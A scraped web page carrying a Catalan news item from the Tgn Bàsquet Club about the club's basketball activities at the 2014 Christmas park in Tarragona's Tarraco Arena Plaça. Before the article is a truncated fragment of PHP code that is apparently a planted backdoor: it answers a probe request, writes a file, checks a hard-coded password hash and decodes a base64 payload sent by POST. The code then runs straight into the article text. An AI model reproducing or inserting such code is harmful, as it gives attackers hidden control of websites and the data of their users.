function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN Bàsquet, al Parc de Nadal de la Tarraco Arena Plaça (TAP) - Tgn Bàsquet Club -

El TGN Bàsquet, al Parc de Nadal de la Tarraco Arena Plaça (TAP)

By
Updated: desembre 27, 2014

Poca presència de públic en la primera jornada matinal del Parc de Nadal situat a la Tarraco Arena Plaça (TAP) de Tarragona. El TGN Bàsquet té presència en aquesta activitat nadalenca que any rere any se celebra a la ciutat. La principal característica és que, enguany, el Parc de Nadal s’ha dividit en dos: el recinte firal del Palau de Congressos i la TAP. A l’antiga plaça de toros s’hi ha instal·lat totes aquelles activitats que tenen a veure amb l’esport i estan adreçades a nens més grans de 12 anys. Així, hi ha una cistella de bàsquet i una altra que es pot fer de minibàsquet. “De moment han passat pocs nens però s’ha de dir que hem començat avui i molta gent encara no coneix que estem situats aquí”, diu Javi Vinader, responsable del TGN Bàsquet al Parc de Nadal. Així, entre les activitats previstes pel conjunt lila hi ha les competicions de tir, de dos contra dos, tres contra tres, etc. “L’objectiu és, bàsicament, que els nens s’ho passin bé jugant. Pel club és una bona oportunitat per seguir donant-se a conèixer”, afirma.

El Parc de Nadal està obert d’avui fins al dia 2 de gener i els horaris són d’11 a 2 del migdia i de 5 de la tarda a 9 del vespre.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *